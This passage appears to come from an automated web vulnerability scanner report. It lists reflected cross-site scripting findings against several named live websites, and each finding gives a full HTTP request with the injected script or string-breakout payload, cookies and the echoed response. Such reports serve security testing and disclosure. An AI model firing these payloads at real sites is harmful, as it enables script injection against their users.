This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content/ServeResource.aspxfa860'%3b7174f58ce9f?id=687&ticks=1915729545 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/Content/ServeContent.aspx?iframe=1&id=687&ticks=1915729545
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56168
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:13 GMT
Date: Fri, 01 Apr 2011 18:11:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content/ServeResource.aspxfa860';7174f58ce9f/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.28. http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://manhattan.ny1.com
Path:	/content/top_stories/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b67a1'%3b361ba9d45fb was submitted in the REST URL parameter 1. This input was echoed as b67a1';361ba9d45fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /contentb67a1'%3b361ba9d45fb/top_stories/ HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56145
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:29 GMT
Date: Fri, 01 Apr 2011 18:11:29 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/contentb67a1';361ba9d45fb/top_stories/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.29. http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://manhattan.ny1.com
Path:	/content/top_stories/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc2d4'%3b52263977e93 was submitted in the REST URL parameter 2. This input was echoed as dc2d4';52263977e93 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /content/top_storiesdc2d4'%3b52263977e93/ HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56146
Vary: Accept-Encoding
Cache-Control: public, max-age=564
Expires: Fri, 01 Apr 2011 18:20:59 GMT
Date: Fri, 01 Apr 2011 18:11:35 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/content/top_storiesdc2d4';52263977e93/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.30. http://manhattan.ny1.com/content/top_stories/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://manhattan.ny1.com
Path:	/content/top_stories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6532b'-alert(1)-'736431dcdb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/top_stories/?6532b'-alert(1)-'736431dcdb1=1 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:24 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 86281
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:26 GMT
Date: Fri, 01 Apr 2011 18:11:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - - NY1.com
</title><me
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?SectionPath=%2fcontent%2ftop_stories%2f&6532b'-alert(1)-'736431dcdb1=1'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.31. http://pixel.fetchback.com/serve/fb/pdc [name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload a1c83<x%20style%3dx%3aexpression(alert(1))>6abbaef0b4c was submitted in the name parameter. This input was echoed as a1c83<x style=x:expression(alert(1))>6abbaef0b4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landinga1c83<x%20style%3dx%3aexpression(alert(1))>6abbaef0b4c&sid=3047 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.mercantila.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; cre=1_1300993416_20056:6436:8:0_15292:30504:1:161993_19000:38838:1:162006_20053:24803:11:351268_20054:24802:1:351668_14598:11789:1:1624812; kwd=1_1300993416_11317:582230_11717:582230_11718:582230_11719:582230_11722:690865_10827:690865_10842:690869_10839:690869_10824:691069; scg=1_1300993416; ppd=1_1300993416; uid=1_1300993418_1297862321306:0415785655118336; eng=1_1300993418_20056:0

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:01:55 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1301677315_11259:9_10164:1266129_10638:1266129_10640:1266129_10641:1266129_1437:1266129_8900:1266168_9081:1374745_9085:1374745_8956:1374745_9083:1374768_9084:1374768_8956:1374768_20:2507591; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: uid=1_1301677315_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: kwd=1_1301677315_11317:1266129_11717:1266129_11718:1266129_11719:1266129_11722:1374764_10827:1374764_10842:1374768_10839:1374768_10824:1374968; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: sit=1_1301677315_3047:9:9_2701:1266168:1266168_719:1266250:1266129_2707:1374968:1374745_3225:1656406:1656406_828:2178921:2178921_11:2582846:2507591_3314:2586584:2505500_3289:2587834:2582347_2002:3814994:3813773; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: cre=1_1301677315_20056:6436:8:683899_15292:30504:1:845892_19000:38838:1:845905_20053:24803:11:1035167_20054:24802:1:1035567_14598:11789:1:2308711; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: bpd=1_1301677315_h9i9:Aq40; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: apd=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: scg=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: ppd=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: afl=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Fri, 01 Apr 2011 17:01:55 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

2.32. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 15ac4<script>alert(1)</script>2c7cb34e591 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1301681747022&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-2873892966714049&slotname=Header-Logo_468x6015ac4<script>alert(1)</script>2c7cb34e591&page_slots=Header-Logo_468x60&cookie_enabled=1&url=http%3A%2F%2Fwww.androidtapp.com%2Ffavicon.icoef3b2%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Ed2de5acaa49&ref=http%3A%2F%2Fburp%2Fshow%2F38&lmt=1301699700&dt=1301681747026&cc=17&biw=1134&bih=1004&ifi=1&adk=2159343720&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154&gads=v2&ga_vid=1576293089.1301681747&ga_sid=1301681747&ga_hid=1506484284 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMedia=Coun%3ANA/Postal%3ANA/; TMediaISP=SoftLayer%20Technologies; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __utmz=251550727.1300542524.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=251550727.1167224488.1300542524.1300542524.1300542524.1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

2.33. http://suggest.infospace.com/QuerySuggest/SuggestServlet [reqID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://suggest.infospace.com
Path:	/QuerySuggest/SuggestServlet

Issue detail

The value of the reqID request parameter is copied into the HTML document as plain text between tags. The payload fc91e<script>alert(1)</script>dbedd732ef was submitted in the reqID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /QuerySuggest/SuggestServlet?prefix=site%3Axs&reqID=JscriptId1301677023385fc91e<script>alert(1)</script>dbedd732ef HTTP/1.1
Host: suggest.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 97
Date: Fri, 01 Apr 2011 16:57:02 GMT
Connection: close

iSuggest.PopulateResults(null, "JscriptId1301677023385fc91e<script>alert(1)</script>dbedd732ef");

2.34. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 8e422<script>alert(1)</script>f34f9bd50bb was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=4808e422<script>alert(1)</script>f34f9bd50bb&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:23 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 4808e422<script>alert(1)</script>f34f9bd50bb-SM=adver_04-01-2011-18-11-23; expires=Mon, 04-Apr-2011 18:11:23 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4808e422<script>alert(1)</script>f34f9bd50bb-VT=adver_04-01-2011-18-11-23_13441394191301681483; expires=Wed, 30-Mar-2016 18:11:23 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4808e422<script>alert(1)</script>f34f9bd50bb-nUID=adver_13441394191301681483; expires=Fri, 01-Apr-2011 18:26:23 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='4808e422<script>alert(1)</script>f34f9bd50bb';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='15400897811300976568';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='13441394191301681483';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv=
...[SNIP]...

2.35. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7981b<script>alert(1)</script>31ea891ceea was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver7981b<script>alert(1)</script>31ea891ceea&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:20 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:20 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-54_430031711301681454ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver7981b%3Cscript%3Ealert%281%29%3C%2Fscript%3E31ea891ceea_04-01-2011-18-11-20_15585547251301681480; expires=Wed, 30-Mar-2016 18:11:20 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_430031711301681454ZZZZadcon_13920678781301681468ZZZZadver7981b%3Cscript%3Ealert%281%29%3C%2Fscript%3E31ea891ceea_15585547251301681480; expires=Fri, 01-Apr-2011 18:26:20 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver7981b<script>alert(1)</script>31ea891ceea';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='15400897811300976568';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='155855472513016
...[SNIP]...

2.36. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d177f<script>alert(1)</script>3c8db14e364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/d177f<script>alert(1)</script>3c8db14e364&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:35 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-35_4412925081301681495; expires=Wed, 30-Mar-2016 18:11:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_4412925081301681495; expires=Fri, 01-Apr-2011 18:26:35 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='4412925081301681495';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/d177f<script>alert(1)</script>3c8db14e364';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.37. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 63583<script>alert(1)</script>77c5e15e0f0 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=63583<script>alert(1)</script>77c5e15e0f0&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:28 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:28 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-28_14327144791301681488; expires=Wed, 30-Mar-2016 18:11:28 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_14327144791301681488; expires=Fri, 01-Apr-2011 18:26:28 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
